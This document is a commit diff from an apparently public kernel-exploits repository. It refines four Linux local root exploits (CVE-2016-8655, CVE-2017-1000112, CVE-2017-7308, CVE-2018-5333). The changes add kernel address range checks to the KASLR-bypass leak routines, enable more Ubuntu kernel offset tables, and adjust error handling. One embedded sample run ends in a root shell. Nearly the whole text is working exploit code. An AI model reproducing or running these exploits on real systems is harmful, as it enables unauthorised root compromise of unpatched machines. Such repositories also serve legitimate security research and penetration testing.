Merge pull request bcoles#30 from bcoles/kernel-base-min-max

Define KERNEL_BASE_MIN and KERNEL_BASE_MAX

Author: bcoles

CVE-2016-8655/chocobo_root.c

@@ -1,7 +1,7 @@
 /*
 chocobo_root.c
 linux AF_PACKET race condition exploit for CVE-2016-8655.
-Includes KASLR and SMEP bypasses.
+Includes KASLR and SMEP bypasses. No SMAP bypass.
 For Ubuntu 14.04 / 16.04 (x86_64) kernels 4.4.0 before 4.4.0-53.74.
 All kernel offsets have been tested on Ubuntu / Linux Mint.
 
@@ -114,6 +114,8 @@ Updated by <bcoles@gmail.com>
 #define ENABLE_KASLR_BYPASS		1
 
 #if ENABLE_KASLR_BYPASS
+#  define KERNEL_BASE_MIN		0xffffffff00000000ul
+#  define KERNEL_BASE_MAX		0xffffffffff000000ul
 #  define ENABLE_KASLR_BYPASS_KALLSYMS	1
 #  define ENABLE_KASLR_BYPASS_SYSMAP	1
 #  define ENABLE_KASLR_BYPASS_SYSLOG	1
@@ -666,6 +668,7 @@ void detect_versions() {
 }
 
 // * * * * * * * * * * * * * * syslog KASLR bypass * * * * * * * * * * * * * *
+// https://github.com/xairy/kernel-exploits/blob/master/CVE-2017-1000112/poc.c
 
 #if ENABLE_KASLR_BYPASS_SYSLOG
 #define SYSLOG_ACTION_READ_ALL 3
@@ -694,30 +697,34 @@ int mmap_syslog(char** buffer, int* size) {
 unsigned long get_kernel_addr_trusty(char* buffer, int size) {
     const char* needle1 = "Freeing unused";
     char* substr = (char*)memmem(&buffer[0], size, needle1, strlen(needle1));
-    if (substr == NULL) return 0;
+    if (substr == NULL)
+        return 0;
 
     int start = 0;
     int end = 0;
     for (end = start; substr[end] != '-'; end++);
 
     const char* needle2 = "ffffff";
     substr = (char*)memmem(&substr[start], end - start, needle2, strlen(needle2));
-    if (substr == NULL) return 0;
+    if (substr == NULL)
+        return 0;
 
     char* endptr = &substr[16];
-    unsigned long r = strtoul(&substr[0], &endptr, 16);
+    unsigned long addr = strtoul(&substr[0], &endptr, 16);
 
-    r &= 0xffffffffff000000ul;
+    addr &= 0xffffffffff000000ul;
 
-    return r;
+    if (addr > KERNEL_BASE_MIN && addr < KERNEL_BASE_MAX)
+        return addr;
+
+    return 0;
 }
 
 unsigned long get_kernel_addr_xenial(char* buffer, int size) {
     const char* needle1 = "Freeing unused";
     char* substr = (char*)memmem(&buffer[0], size, needle1, strlen(needle1));
-    if (substr == NULL) {
+    if (substr == NULL)
         return 0;
-    }
 
     int start = 0;
     int end = 0;
@@ -726,17 +733,19 @@ unsigned long get_kernel_addr_xenial(char* buffer, int size) {
 
     const char* needle2 = "ffffff";
     substr = (char*)memmem(&substr[start], end - start, needle2, strlen(needle2));
-    if (substr == NULL) {
+    if (substr == NULL)
         return 0;
-    }
 
     char* endptr = &substr[16];
-    unsigned long r = strtoul(&substr[0], &endptr, 16);
+    unsigned long addr = strtoul(&substr[0], &endptr, 16);
 
-    r &= 0xfffffffffff00000ul;
-    r -= 0x1000000ul;
+    addr &= 0xfffffffffff00000ul;
+    addr -= 0x1000000ul;
 
-    return r;
+    if (addr > KERNEL_BASE_MIN && addr < KERNEL_BASE_MAX)
+        return addr;
+
+    return 0;
 }
 
 unsigned long get_kernel_addr_syslog() {
@@ -762,6 +771,7 @@ unsigned long get_kernel_addr_syslog() {
 #endif
 
 // * * * * * * * * * * * * * * kallsyms KASLR bypass * * * * * * * * * * * * * *
+// https://grsecurity.net/~spender/exploits/exploit.txt
 
 #if ENABLE_KASLR_BYPASS_KALLSYMS
 unsigned long get_kernel_addr_kallsyms() {
@@ -799,6 +809,7 @@ unsigned long get_kernel_addr_kallsyms() {
 #endif
 
 // * * * * * * * * * * * * * * System.map KASLR bypass * * * * * * * * * * * * * *
+// https://grsecurity.net/~spender/exploits/exploit.txt
 
 #if ENABLE_KASLR_BYPASS_SYSMAP
 unsigned long get_kernel_addr_sysmap() {
@@ -868,7 +879,7 @@ unsigned long get_kernel_addr_mincore() {
         for (n = 0; n < getpagesize() / sizeof(unsigned char); n++) {
             addr = *(unsigned long*)(&buf[n]);
             /* Kernel address space */
-            if (addr > 0xffffffff00000000 && addr < 0xffffffffff000000) {
+            if (addr > KERNEL_BASE_MIN && addr < KERNEL_BASE_MAX) {
                 addr &= 0xffffffffff000000ul;
                 if (munmap((void*)0x66000000, 0x20000000000))
                     dprintf("[-] munmap(): %m\n");

CVE-2017-1000112/poc.c

@@ -13,6 +13,7 @@
 // ---
 // $ gcc poc.c -o pwn -Wall
 // $ ./pwn
+// Linux Kernel UDP Fragmentation Offset (UFO) out-of-bounds write local root (CVE-2017-1000112)
 // [.] checking kernel version...
 // [.] kernel version '4.8.0-58-generic' detected
 // [~] done, version looks good
@@ -85,6 +86,8 @@
 #define ENABLE_SMEP_BYPASS		1
 
 #if ENABLE_KASLR_BYPASS
+#  define KERNEL_BASE_MIN		0xffffffff00000000ul
+#  define KERNEL_BASE_MAX		0xffffffffff000000ul
 #  define ENABLE_KASLR_BYPASS_KALLSYMS	1
 #  define ENABLE_KASLR_BYPASS_SYSMAP	1
 #  define ENABLE_KASLR_BYPASS_SYSLOG	1
@@ -192,7 +195,6 @@ struct kernel_info kernels[] = {
 	{ "xenial", "4.8.0-56-generic", 0xa5d00, 0xa60f0, 0x17c55, 0x39d50d, 0x119207, 0x1b170, 0x43a14a, 0x44d4a0, 0x7bd03, 0x12c7d7, 0x64210, 0x49f60 },
 	{ "xenial", "4.8.0-58-generic", 0xa5d20, 0xa6110, 0x17c55, 0xe56f5, 0x119227, 0x1b170, 0x439e7a, 0x162622, 0x7bd23, 0x12c7f7, 0x64210, 0x49fa0 },
 
-	/* Untested:
 	{ "xenial", "4.8.0-34-lowlatency", 0xa6ed0, 0xa72e0, 0x8d, 0x12e349, 0x11c837, 0x1b3d0, 0x4426aa, 0x4bfe3, 0x7c8c3, 0x130367, 0x64910, 0x4b7d0  },
 	{ "xenial", "4.8.0-36-lowlatency", 0xa6ed0, 0xa72e0, 0x8d, 0x12e349, 0x11c837, 0x1b3d0, 0x4426aa, 0x4bfe3, 0x7c8c3, 0x130367, 0x64910, 0x4b7d0  },
 	{ "xenial", "4.8.0-39-lowlatency", 0xa6ec0, 0xa72d0, 0x8d, 0x76172, 0x11c837, 0x1b310, 0x442f8a, 0x108ea3, 0x7c8c3, 0x130367, 0x64910, 0x4b7c0  },
@@ -202,10 +204,8 @@ struct kernel_info kernels[] = {
 	{ "xenial", "4.8.0-45-lowlatency", 0xa6ec0, 0xa72d0, 0x8d, 0x46c32c, 0x11c837, 0x1b310, 0x442fba, 0x108ea3, 0x7c8c3, 0x130357, 0x64910, 0x4b7c0 },
 	{ "xenial", "4.8.0-46-lowlatency", 0xa6ec0, 0xa72d0, 0x8d, 0x46c32c, 0x11c837, 0x1b310, 0x442fba, 0x108ea3, 0x7c8c3, 0x130357, 0x64910, 0x4b7c0 },
 	{ "xenial", "4.8.0-49-lowlatency", 0xa6ed0, 0xa72e0, 0x8d, 0x12e349, 0x11c847, 0x1b310, 0x44312a, 0x41d233, 0x7c8d3, 0x130367, 0x64910, 0x4b7c0 },
-	{ "xenial", "4.8.0-51-lowlatency", 0xa6ed0, 0xa72e0, 0x8d, 0x12e349, 0x11c847, 0x1b310, 0x44312a, 0x41d233, 0x7c8d3, 0x130367, 0x64910, 0x4b7c0 },
+	//{ "xenial", "4.8.0-51-lowlatency", 0xa6ed0, 0xa72e0, 0x8d, 0x12e349, 0x11c847, 0x1b310, 0x44312a, 0x41d233, 0x7c8d3, 0x130367, 0x64910, 0x4b7c0 },
 	{ "xenial", "4.8.0-52-lowlatency", 0xa6ed0, 0xa72e0, 0x8d, 0x12e349, 0x11c847, 0x1b310, 0x44365a, 0x41d763, 0x7c8d3, 0x130367, 0x64910, 0x4b7c0 },
-	*/
-
 	{ "xenial", "4.8.0-53-lowlatency", 0xa6ed0, 0xa72e0, 0x8d, 0xdf526, 0x11c847, 0x1b310, 0x44365a, 0x41d763, 0x7c8d3, 0x130367, 0x64910, 0x4b7c0  },
 	{ "xenial", "4.8.0-54-lowlatency", 0xa6ed0, 0xa72e0, 0x8d, 0x1b061d, 0x11c847, 0x1b310, 0x44365a, 0x2e791c, 0x7c8d3, 0x130367, 0x64910, 0x4b7c0 },
 	{ "xenial", "4.8.0-56-lowlatency", 0xa6ed0, 0xa72e0, 0x8d, 0xda43e, 0x11c847, 0x1b310, 0x4436aa, 0x2e796c, 0x7c8d3, 0x130367, 0x64910, 0x4b7c0 },
@@ -589,30 +589,34 @@ int mmap_syslog(char** buffer, int* size) {
 unsigned long get_kernel_addr_trusty(char* buffer, int size) {
 	const char* needle1 = "Freeing unused";
 	char* substr = (char*)memmem(&buffer[0], size, needle1, strlen(needle1));
-	if (substr == NULL) return 0;
+	if (substr == NULL)
+		return 0;
 
 	int start = 0;
 	int end = 0;
 	for (end = start; substr[end] != '-'; end++);
 
 	const char* needle2 = "ffffff";
 	substr = (char*)memmem(&substr[start], end - start, needle2, strlen(needle2));
-	if (substr == NULL) return 0;
+	if (substr == NULL)
+		return 0;
 
 	char* endptr = &substr[16];
-	unsigned long r = strtoul(&substr[0], &endptr, 16);
+	unsigned long addr = strtoul(&substr[0], &endptr, 16);
+
+	addr &= 0xffffffffff000000ul;
 
-	r &= 0xffffffffff000000ul;
+	if (addr > KERNEL_BASE_MIN && addr < KERNEL_BASE_MAX)
+		return addr;
 
-	return r;
+	return 0;
 }
 
 unsigned long get_kernel_addr_xenial(char* buffer, int size) {
 	const char* needle1 = "Freeing unused";
 	char* substr = (char*)memmem(&buffer[0], size, needle1, strlen(needle1));
-	if (substr == NULL) {
+	if (substr == NULL)
 		return 0;
-	}
 
 	int start = 0;
 	int end = 0;
@@ -621,17 +625,19 @@ unsigned long get_kernel_addr_xenial(char* buffer, int size) {
 
 	const char* needle2 = "ffffff";
 	substr = (char*)memmem(&substr[start], end - start, needle2, strlen(needle2));
-	if (substr == NULL) {
+	if (substr == NULL)
 		return 0;
-	}
 
 	char* endptr = &substr[16];
-	unsigned long r = strtoul(&substr[0], &endptr, 16);
+	unsigned long addr = strtoul(&substr[0], &endptr, 16);
 
-	r &= 0xfffffffffff00000ul;
-	r -= 0x1000000ul;
+	addr &= 0xfffffffffff00000ul;
+	addr -= 0x1000000ul;
 
-	return r;
+	if (addr > KERNEL_BASE_MIN && addr < KERNEL_BASE_MAX)
+		return addr;
+
+	return 0;
 }
 
 unsigned long get_kernel_addr_syslog() {
@@ -893,7 +899,7 @@ unsigned long get_kernel_addr_mincore() {
 		for (n = 0; n < getpagesize() / sizeof(unsigned char); n++) {
 			addr = *(unsigned long*)(&buf[n]);
 			/* Kernel address space */
-			if (addr > 0xffffffff00000000 && addr < 0xffffffffff000000) {
+			if (addr > KERNEL_BASE_MIN && addr < KERNEL_BASE_MAX) {
 				addr &= 0xffffffffff000000ul;
 
 				if (munmap((void*)0x66000000, 0x20000000000))
@@ -979,7 +985,7 @@ void setup_sandbox() {
 		exit(EXIT_FAILURE);
 	}
 	if (unshare(CLONE_NEWNET) != 0) {
-		dprintf("[-] unshare(CLONE_NEWUSER): %m\n");
+		dprintf("[-] unshare(CLONE_NEWNET): %m\n");
 		exit(EXIT_FAILURE);
 	}
 

CVE-2017-7308/poc.c

@@ -7,7 +7,7 @@
 //
 // https://github.com/xairy/kernel-exploits/tree/master/CVE-2017-7308
 // ---
-// $ gcc poc.c -o pwn
+// $ gcc poc.c -o pwn -Wall
 // $ ./pwn
 // Linux Kernel AF_PACKET packet_set_ring heap out-of-bounds write local root (CVE-2017-7308)
 // [.] checking kernel version
@@ -93,6 +93,8 @@
 #define ENABLE_SMEP_SMAP_BYPASS		1
 
 #if ENABLE_KASLR_BYPASS
+#  define KERNEL_BASE_MIN		0xffffffff00000000ul
+#  define KERNEL_BASE_MAX		0xffffffffff000000ul
 #  define ENABLE_KASLR_BYPASS_KALLSYMS	1
 #  define ENABLE_KASLR_BYPASS_SYSMAP	1
 #  define ENABLE_KASLR_BYPASS_SYSLOG	1
@@ -324,7 +326,7 @@ void oob_timer_execute(void *func, unsigned long arg) {
 }
 
 void oob_id_match_execute(void *func) {
-	int s = oob_setup(2048 + XMIT_OFFSET - 64);
+	oob_setup(2048 + XMIT_OFFSET - 64);
 
 	int ps[32];
 
@@ -513,7 +515,7 @@ unsigned long get_kernel_addr_syslog_xenial() {
 	int size = klogctl(SYSLOG_ACTION_SIZE_BUFFER, 0, 0);
 	if (size == -1) {
 		dprintf("[-] klogctl(SYSLOG_ACTION_SIZE_BUFFER): %m\n");
-		exit(EXIT_FAILURE);
+		return 0;
 	}
 
 	size = (size / getpagesize() + 1) * getpagesize();
@@ -523,30 +525,31 @@ unsigned long get_kernel_addr_syslog_xenial() {
 	size = klogctl(SYSLOG_ACTION_READ_ALL, &buffer[0], size);
 	if (size == -1) {
 		dprintf("[-] klogctl(SYSLOG_ACTION_READ_ALL): %m\n");
-		exit(EXIT_FAILURE);
+		return 0;
 	}
 
 	const char *needle1 = "Freeing SMP";
 	char *substr = (char *)memmem(&buffer[0], size, needle1, strlen(needle1));
-	if (substr == NULL) {
-		exit(EXIT_FAILURE);
-	}
+	if (substr == NULL)
+		return 0;
 
 	for (size = 0; substr[size] != '\n'; size++);
 
 	const char *needle2 = "ffff";
 	substr = (char *)memmem(&substr[0], size, needle2, strlen(needle2));
-	if (substr == NULL) {
-		exit(EXIT_FAILURE);
-	}
+	if (substr == NULL)
+		return 0;
 
 	char *endptr = &substr[16];
-	unsigned long r = strtoul(&substr[0], &endptr, 16);
+	unsigned long addr = strtoul(&substr[0], &endptr, 16);
+
+	addr &= 0xfffffffffff00000ul;
+	addr -= 0x1000000ul;
 
-	r &= 0xfffffffffff00000ul;
-	r -= 0x1000000ul;
+	if (addr > KERNEL_BASE_MIN && addr < KERNEL_BASE_MAX)
+		return addr;
 
-	return r;
+	return 0;
 }
 #endif
 

CVE-2018-5333/cve-2018-5333.c

@@ -75,7 +75,7 @@
 // [.] prepare_kernel_cred: ffffffff9f0a50e0
 // [.] mmapping fake stack...
 // [~] done, fake stack mmapped
-// [.] executing payload 402119...
+// [.] executing payload 0x402119...
 // [+] got root
 // # id
 // uid=0(root) gid=0(root) groups=0(root)
@@ -116,6 +116,8 @@
 #define ENABLE_KASLR_BYPASS             1
 
 #if ENABLE_KASLR_BYPASS
+#  define KERNEL_BASE_MIN               0xffffffff00000000ul
+#  define KERNEL_BASE_MAX               0xffffffffff000000ul
 #  define ENABLE_KASLR_BYPASS_KALLSYMS  1
 #  define ENABLE_KASLR_BYPASS_SYSMAP    1
 #  define ENABLE_KASLR_BYPASS_SYSLOG    1
@@ -149,6 +151,7 @@ struct kernel_info kernels[] = {
   { "4.4.0-21-generic #37-Ubuntu",   0xa21c0, 0xa25b0, 0x5d0c5, 0x178157, 0x3f8158, 0x64644, 0x4cc7da },
   { "4.4.0-22-generic #40-Ubuntu",   0xa2220, 0xa2610, 0x5d0c5, 0x178217, 0x3f89e8, 0x64644, 0x7d005  },
   { "4.4.0-24-generic #43-Ubuntu",   0xa2340, 0xa2730, 0x5d0c5, 0x178447, 0x3f98b8, 0x64644, 0x7d125  },
+  { "4.4.0-28-generic #47-Ubuntu",   0xa24a0, 0xa2890, 0x5d0c5, 0x178717, 0x3f9f38, 0x64644, 0x585dc  },
   { "4.4.0-31-generic #50-Ubuntu",   0xa24a0, 0xa2890, 0x5d0c5, 0x1787a7, 0x3ffed8, 0x64644, 0x7d125  },
   { "4.4.0-38-generic #57-Ubuntu",   0xa2570, 0xa2960, 0x5d0c5, 0x178a97, 0x400968, 0x64634, 0x7d1e5  },
   { "4.4.0-42-generic #62-Ubuntu",   0xa25c0, 0xa29b0, 0x5d0c5, 0x178ac7, 0x400d78, 0x64634, 0x7d1a5  },
@@ -563,17 +566,20 @@ unsigned long get_kernel_addr_syslog_xenial(char* buffer, int size) {
 
   const char* needle2 = "ffffff";
   substr = (char*)memmem(&substr[start], end - start, needle2, strlen(needle2));
-  if (substr == NULL) {
+
+  if (substr == NULL)
     return 0;
-  }
 
   char* endptr = &substr[16];
-  unsigned long r = strtoul(&substr[0], &endptr, 16);
+  unsigned long addr = strtoul(&substr[0], &endptr, 16);
 
-  r &= 0xfffffffffff00000ul;
-  r -= 0x1000000ul;
+  addr &= 0xfffffffffff00000ul;
+  addr -= 0x1000000ul;
 
-  return r;
+  if (addr > KERNEL_BASE_MIN && addr < KERNEL_BASE_MAX)
+    return addr;
+
+  return 0;
 }
 
 unsigned long get_kernel_addr_syslog() {
@@ -753,7 +759,7 @@ unsigned long get_kernel_addr_mincore() {
     for (n = 0; n < getpagesize() / sizeof(unsigned char); n++) {
       addr = *(unsigned long*)(&buf[n]);
       /* Kernel address space */
-      if (addr > 0xffffffff00000000 && addr < 0xffffffffff000000) {
+      if (addr > KERNEL_BASE_MIN && addr < KERNEL_BASE_MAX) {
         addr &= 0xffffffffff000000ul;
         if (munmap((void*)0x66000000, 0x20000000000))
           dprintf("[-] munmap(): %m\n");